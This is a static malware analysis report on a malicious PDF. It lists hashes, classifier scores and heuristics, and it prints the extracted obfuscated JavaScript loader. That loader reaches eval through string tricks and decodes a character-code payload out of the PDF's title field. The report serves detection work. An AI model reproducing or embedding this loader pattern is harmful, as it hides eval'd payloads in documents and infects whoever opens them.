Malicious PDF — malware analysis report

Static analysis result for SHA-256 44f259003f497e38…

Verdict: MALICIOUS
File type: PDF
Size: 45.2 KB
First seen: 2026-05-07
MD5: 190ddd8ac6751bccdc8e5897a11a1b04
SHA-1: 3a7b5610d5ca783f2093884ba3b40bcfd090319f
SHA-256: 44f259003f497e3812ffdc0dded7c3ce75fc4299712ad92cf58ee109354cf3b6
Risk score: 86

Malware Insights

This PDF file was flagged as malicious by an ML classifier with high confidence. It contains embedded JavaScript, which is often used to download and execute further payloads. The JavaScript action and embedded JS stream heuristics indicate the presence of malicious scripting within the document. No specific IOCs were extracted, but the presence of JavaScript is a strong indicator of malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (3)

  • Obfuscated Pidief-style JavaScript loader (stage not decoded) [severity: high; CVE-related; rule: PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER]
    PDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family: a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
  • JavaScript action [severity: low; 1 related finding; rule: PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream [severity: low; rule: PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0001_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 1 at offset 0xB256
Size: 445 bytes
SHA-256: 46f8bdd4ed8adb32f13bd956465c2dff2ab13e5ca65e1133616b69bae3d75e82

Script preview (first 1,000 lines of the extracted script):
qwe = ('nhsthn','ntrht').substr;
var g = qwe();
t='le';
a=["e","a","n","b","w",'v'];
e=g[a[0]+a[5]+a[1]+t[0]];
adj='';
houxg=('qwrwqr','tit');
e('gab=t'+('qwtwqt','hisundefined').replace(typeof qwe.dagb,'.')+'tit'+t);
vklnd=e('String.fr'+gab.substr(0,10));
qrzh = e(gab.substr(10)['replace'](/u/g,','));
e('k=qrzh.length');
for (i = 0; i < k; i+=2) {
	yfgui = qrzh[i+1] + ('erybjkerl',qrzh[i]);
	adj += vklnd(yfgui);
}
e(adj);